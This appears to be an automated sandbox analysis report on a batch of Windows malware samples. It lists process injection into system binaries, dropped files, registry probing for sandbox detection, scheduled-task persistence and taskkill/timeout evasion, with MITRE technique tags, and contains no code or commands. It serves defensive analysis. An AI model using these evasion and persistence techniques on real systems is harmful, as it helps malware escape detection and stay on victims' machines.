Setuр.execmd.exeSetuр.exenig1r21312312.exeSetuр.exeSetuр.exeSetuр.exeSetuр.exeSetuр.exeSetuр.exechrome.exeSetuр.exeSetuр.exe

pid	process
5704	Setuр.exe
5704	Setuр.exe
5972	cmd.exe
5972	cmd.exe
6120	Setuр.exe
5548	nig1r21312312.exe
2212	Setuр.exe
7180	Setuр.exe
6120	Setuр.exe
5548	nig1r21312312.exe
2212	Setuр.exe
7180	Setuр.exe
1476	Setuр.exe
5824	Setuр.exe
1476	Setuр.exe
5292	Setuр.exe
6532	Setuр.exe
8188	chrome.exe
5824	Setuр.exe
6532	Setuр.exe
5292	Setuр.exe
8188	chrome.exe
3968	Setuр.exe
3968	Setuр.exe
9712	Setuр.exe
9712	Setuр.exe

Suspicious use of SetThreadContext 55 IoCs

Processes:

RFQ2.exew43kj59.exebrg.exeEBZfayui1.exeRFQ2.exechrome.exe76feee748612466fbd3f219b1adae8b4 (1).exe76feee748612466fbd3f219b1adae8b4 (1).exeanimecool.exepoxuipluspoxui.exeMisakaMikoto213213.exeEBZfayui1.execmd.exestpoeoeiej.exeanimecool.exechrome.exelegenda.exeMisakaMikoto213213.exeRFQ2.exestpoeoeiej.exepoxuipluspoxui.exess29.exendt5tk.exenig1r21312312.exepoxuipluspoxui.exeanimecool.exeis-H0G9H.tmpvbc.exeanimecool.exepoxuipluspoxui.exepoxuipluspoxui.exeanimecool.exepoxuipluspoxui.exeMisakaMikoto213213.exeMisakaMikoto213213.exenig1r21312312.exeMisakaMikoto213213.exeMisakaMikoto213213.exeanimecool.exepoxuipluspoxui.exeMisakaMikoto213213.exestpoeoeiej.exeanimecool.exepoxuipluspoxui.exebrg.exe76feee748612466fbd3f219b1adae8b4 (1).exeMisakaMikoto213213.exeuciugwjstpoeoeiej.exebrg.exestpoeoeiej.exebrg.exe

description	pid	process	target process
PID 4304 set thread context of 988	4304	RFQ2.exe	InstallUtil.exe
PID 4024 set thread context of 3060	4024	w43kj59.exe	AppLaunch.exe
PID 3852 set thread context of 1384	3852	brg.exe	aspnet_wp.exe
PID 4268 set thread context of 3404	4268	EBZfayui1.exe	vbc.exe
PID 4696 set thread context of 3420	4696		fb94349c162808651fb84b58e6881eb0.exe
PID 3248 set thread context of 2284	3248		vbc.exe
PID 6060 set thread context of 6052	6060	RFQ2.exe	InstallUtil.exe
PID 4864 set thread context of 2212	4864	chrome.exe	Setuр.exe
PID 908 set thread context of 4208	908	76feee748612466fbd3f219b1adae8b4 (1).exe	AppLaunch.exe
PID 5952 set thread context of 5372	5952	76feee748612466fbd3f219b1adae8b4 (1).exe	AppLaunch.exe
PID 5812 set thread context of 3516	5812	animecool.exe	vbc.exe
PID 3240 set thread context of 4108	3240	poxuipluspoxui.exe	vbc.exe
PID 5488 set thread context of 4972	5488	MisakaMikoto213213.exe	csc.exe
PID 2628 set thread context of 1340	2628	EBZfayui1.exe	vbc.exe
PID 5748 set thread context of 3288	5748	cmd.exe	AddInProcess32.exe
PID 3580 set thread context of 6460	3580	stpoeoeiej.exe	stpoeoeiej.exe
PID 6364 set thread context of 6848	6364	animecool.exe	vbc.exe
PID 6508 set thread context of 7084	6508	chrome.exe	vbc.exe
PID 1728 set thread context of 6860	1728	legenda.exe	AppLaunch.exe
PID 6644 set thread context of 6900	6644	MisakaMikoto213213.exe	vbc.exe
PID 6416 set thread context of 7016	6416	RFQ2.exe	InstallUtil.exe
PID 5688 set thread context of 4604	5688	stpoeoeiej.exe	stpoeoeiej.exe
PID 6340 set thread context of 6444	6340	poxuipluspoxui.exe	InstallUtil.exe
PID 6712 set thread context of 5460	6712	ss29.exe	build2.exe
PID 5228 set thread context of 8032	5228	ndt5tk.exe	brg.exe
PID 4280 set thread context of 8120	4280	nig1r21312312.exe	uciugwj
PID 8136 set thread context of 7688	8136	poxuipluspoxui.exe	vbc.exe
PID 6148 set thread context of 1944	6148	animecool.exe	vbc.exe
PID 6448 set thread context of 6700	6448	is-H0G9H.tmp	vbc.exe
PID 1632 set thread context of 2680	1632	vbc.exe	vbc.exe
PID 6340 set thread context of 4784	6340	poxuipluspoxui.exe	vbc.exe
PID 5384 set thread context of 112	5384	animecool.exe	vbc.exe
PID 3148 set thread context of 6920	3148	poxuipluspoxui.exe	vbc.exe
PID 184 set thread context of 2384	184	poxuipluspoxui.exe	vbc.exe
PID 7108 set thread context of 1848	7108	animecool.exe	vbc.exe
PID 7516 set thread context of 6664	7516	poxuipluspoxui.exe	vbc.exe
PID 608 set thread context of 6360	608	MisakaMikoto213213.exe	WerFault.exe
PID 3432 set thread context of 3976	3432	MisakaMikoto213213.exe	vbc.exe
PID 7264 set thread context of 5844	7264	nig1r21312312.exe	vbc.exe
PID 5716 set thread context of 1632	5716	MisakaMikoto213213.exe	vbc.exe
PID 5852 set thread context of 4796	5852	MisakaMikoto213213.exe	vbc.exe
PID 7980 set thread context of 9592	7980	animecool.exe	vbc.exe
PID 4740 set thread context of 6828	4740	poxuipluspoxui.exe	vbc.exe
PID 9996 set thread context of 9204	9996	MisakaMikoto213213.exe	vbc.exe
PID 10032 set thread context of 7840	10032	stpoeoeiej.exe	stpoeoeiej.exe
PID 10064 set thread context of 8260	10064	animecool.exe	vbc.exe
PID 6624 set thread context of 4312	6624	poxuipluspoxui.exe	legenda.exe
PID 8032 set thread context of 1084	8032	brg.exe	jsc.exe
PID 8612 set thread context of 4680	8612	76feee748612466fbd3f219b1adae8b4 (1).exe	AppLaunch.exe
PID 2160 set thread context of 2308	2160	MisakaMikoto213213.exe	vbc.exe
PID 9472 set thread context of 6488	9472	uciugwj	uciugwj
PID 3960 set thread context of 1932	3960	stpoeoeiej.exe	stpoeoeiej.exe
PID 6828 set thread context of 10056	6828	brg.exe	AddInProcess32.exe
PID 9068 set thread context of 1064	9068	stpoeoeiej.exe	stpoeoeiej.exe
PID 5876 set thread context of 9276	5876	brg.exe	jsc.exe

Drops file in Program Files directory 49 IoCs

Processes:

is-MF08M.tmpis-K8DJL.tmpsetup.exeis-VHBPS.tmpsetup.exeis-SC6PG.tmpis-KBELP.tmpis-ABQD5.tmpis-B6NHC.tmpis-H0G9H.tmpConhost.exeis-KOI1L.tmpis-OOJDL.tmpaspnet_wp.exeis-F3DI9.tmpchrome.exeis-Q3K08.tmpis-I05L8.tmpis-S657C.tmpis-LQG72.tmpchrome.exe

description	ioc	process
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-G1LGT.tmp	is-MF08M.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-CLNMD.tmp	is-K8DJL.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-8607O.tmp	setup.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-JDA09.tmp	is-VHBPS.tmp
File opened for modification	C:\Program Files (x86)\FJBsoftFR\FRec323\FRec323.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230323224453.pma	setup.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-AD6D6.tmp	is-SC6PG.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-NLF9B.tmp	is-KBELP.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-FO7GF.tmp	is-ABQD5.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-G3B0E.tmp	is-B6NHC.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-K2VUD.tmp	setup.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\data\is-ES4NQ.tmp	setup.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-QCM2B.tmp	is-K8DJL.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-9NIBS.tmp	is-B6NHC.tmp
File opened for modification	C:\Program Files (x86)\FJBsoftFR\FRec323\unins000.dat	setup.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-P036B.tmp	is-H0G9H.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-NEELV.tmp	Conhost.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-IK3VU.tmp	is-SC6PG.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-Q1U4N.tmp	is-VHBPS.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-5NKS0.tmp	is-KOI1L.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-D5FJT.tmp	is-KOI1L.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-9H59S.tmp	is-OOJDL.tmp
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\227bf297-7b7a-4994-b184-2849879296d8.tmp	setup.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-T9APD.tmp	aspnet_wp.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-E4QVT.tmp	is-F3DI9.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-2E30F.tmp	is-ABQD5.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-HEBQU.tmp	is-KBELP.tmp
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log	chrome.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-8OVTN.tmp	setup.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-E4QVS.tmp	is-OOJDL.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-SAJR2.tmp	is-Q3K08.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-FVRGT.tmp	is-I05L8.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-800CR.tmp	is-S657C.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-6GGK6.tmp	is-S657C.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-LNG0L.tmp	is-MF08M.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-RS2MK.tmp	is-LQG72.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-89F7H.tmp	is-LQG72.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-9H59S.tmp	is-F3DI9.tmp
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-4VKVE.tmp	setup.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-BD3V5.tmp	Conhost.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-OV8Q0.tmp	aspnet_wp.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-PSI2D.tmp	is-I05L8.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-3SG6H.tmp	is-Q3K08.tmp
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-815FB.tmp	is-H0G9H.tmp
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log	chrome.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\unins000.dat	setup.exe
File created	C:\Program Files (x86)\FJBsoftFR\FRec323\is-HQTFQ.tmp	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1976	4024	WerFault.exe	76feee748612466fbd3f219b1adae8b4 (1).exe
312	4424	WerFault.exe	rundll32.exe
5448	2824	WerFault.exe	lower.exe
5852	2824	WerFault.exe	lower.exe
5144	2824	WerFault.exe	lower.exe
5208	4104	WerFault.exe	v4630nF.exe
5648	2824	WerFault.exe	lower.exe
5740	2184	WerFault.exe	cor7640.exe
1480	2824	WerFault.exe	lower.exe
320	2824	WerFault.exe	lower.exe
548	2824	WerFault.exe	lower.exe
5656	2824	WerFault.exe	lower.exe
4352	2824	WerFault.exe	lower.exe
3732	5276	WerFault.exe	rundll32.exe
1892	2824	WerFault.exe	lower.exe
3384	908	WerFault.exe	76feee748612466fbd3f219b1adae8b4 (1).exe
4440	5952	WerFault.exe	76feee748612466fbd3f219b1adae8b4 (1).exe
5472	5784	WerFault.exe	lower.exe
2500	4024	WerFault.exe	w43kj59.exe
3272	4808	WerFault.exe	dsq85s03.exe
912	4496	WerFault.exe	76feee748612466fbd3f219b1adae8b4 (2)2.exe
5884	6760	WerFault.exe	rundll32.exe
6296	1728	WerFault.exe	76feee748612466fbd3f219b1adae8b4 (1).exe
6408	4104	WerFault.exe	w43kj59.exe
6684	1380	WerFault.exe	76feee748612466fbd3f219b1adae8b4 (2)2.exe
4104	6228	WerFault.exe	lower.exe
1552	6228	WerFault.exe	lower.exe
4396	4676	WerFault.exe	v4630nF.exe
6760	6472	WerFault.exe	cor7640.exe
728	6228	WerFault.exe	lower.exe
1012	6228	WerFault.exe	lower.exe
2512	6228	WerFault.exe	lower.exe
2916	6228	WerFault.exe	lower.exe
3832	6228	WerFault.exe	lower.exe
3864	6228	WerFault.exe	lower.exe
6340	6228	WerFault.exe	lower.exe
5356	6228	WerFault.exe	lower.exe
2472	5228	WerFault.exe	ndt5tk.exe
6696	5508	WerFault.exe	w43kj59.exe
4588	6980	WerFault.exe	dsq85s03.exe
4560	5648	WerFault.exe	76feee748612466fbd3f219b1adae8b4 (2)2.exe
6360	8832	WerFault.exe	rundll32.exe
9548	8612	WerFault.exe	76feee748612466fbd3f219b1adae8b4 (1).exe
7588	1064	WerFault.exe	lower.exe
7900	1064	WerFault.exe	lower.exe
1116	1064	WerFault.exe	lower.exe
9932	1064	WerFault.exe	lower.exe
1324	1064	WerFault.exe	lower.exe
10184	1064	WerFault.exe	lower.exe
9068	1064	WerFault.exe	lower.exe
9444	1064	WerFault.exe	lower.exe
1360	1064	WerFault.exe	lower.exe
4648	1064	WerFault.exe	lower.exe
6796	5628	WerFault.exe	cor7640.exe
2368	8936	WerFault.exe	v4630nF.exe
7684	9116	WerFault.exe	dsq85s03.exe
4540	6264	WerFault.exe	w43kj59.exe
8228	5760	WerFault.exe	rundll32.exe
8428	10100	WerFault.exe	lower.exe
5676	10100	WerFault.exe	lower.exe
9248	10100	WerFault.exe	lower.exe
8144	10100	WerFault.exe	lower.exe
3984	10100	WerFault.exe	lower.exe
9688	10100	WerFault.exe	lower.exe

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

fb94349c162808651fb84b58e6881eb0.exeuciugwjuciugwj

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fb94349c162808651fb84b58e6881eb0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uciugwj
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fb94349c162808651fb84b58e6881eb0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	fb94349c162808651fb84b58e6881eb0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uciugwj
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uciugwj
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uciugwj
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uciugwj
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uciugwj

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

build2.exebrg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	brg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	brg.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3872 schtasks.exe
5264 schtasks.exe
5884 schtasks.exe
1368 schtasks.exe
4128 schtasks.exe

pid	process
3872	schtasks.exe
5264	schtasks.exe
5884	schtasks.exe
1368	schtasks.exe
4128	schtasks.exe

Delays execution with timeout.exe 10 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
4172	timeout.exe
4484	timeout.exe
820	timeout.exe
6708	timeout.exe
9724	timeout.exe
9776	timeout.exe
1828	timeout.exe
7640	timeout.exe
5492	timeout.exe
7212	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exemsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4340 taskkill.exe
7628 taskkill.exe
4956 taskkill.exe
5564 taskkill.exe
2364 taskkill.exe

pid	process
4340	taskkill.exe
7628	taskkill.exe
4956	taskkill.exe
5564	taskkill.exe
2364	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

Processes:

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\Toolbar
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133240839975624637"	chrome.exe

Modifies registry class 38 IoCs

Processes:

chrome.exechrome.exemsedge.exeOpenWith.exechrome.exeHeInstaller.exeOpenWith.exechrome.exechrome.exeOpenWith.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1013461898-3711306144-4198452673-1000\{B10510CD-136B-4914-A3D1-813AFD2745C1}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m = f401000040010000
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1013461898-3711306144-4198452673-1000\{E6A4A6D2-503C-4625-80E8-49FCFBC27620}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1013461898-3711306144-4198452673-1000\{D59C2DE9-15A9-49CF-8405-D8379F19A3B0}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	HeInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	HeInstaller.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1013461898-3711306144-4198452673-1000\{E01DAFD0-7CF6-4E3D-A07D-D516B9287357}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3c0000003500000004050000f7030000
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202
Set value (data)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1013461898-3711306144-4198452673-1000\{97276A55-A6F8-4D50-ABA7-93CE6D1BA9D5}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	OpenWith.exe
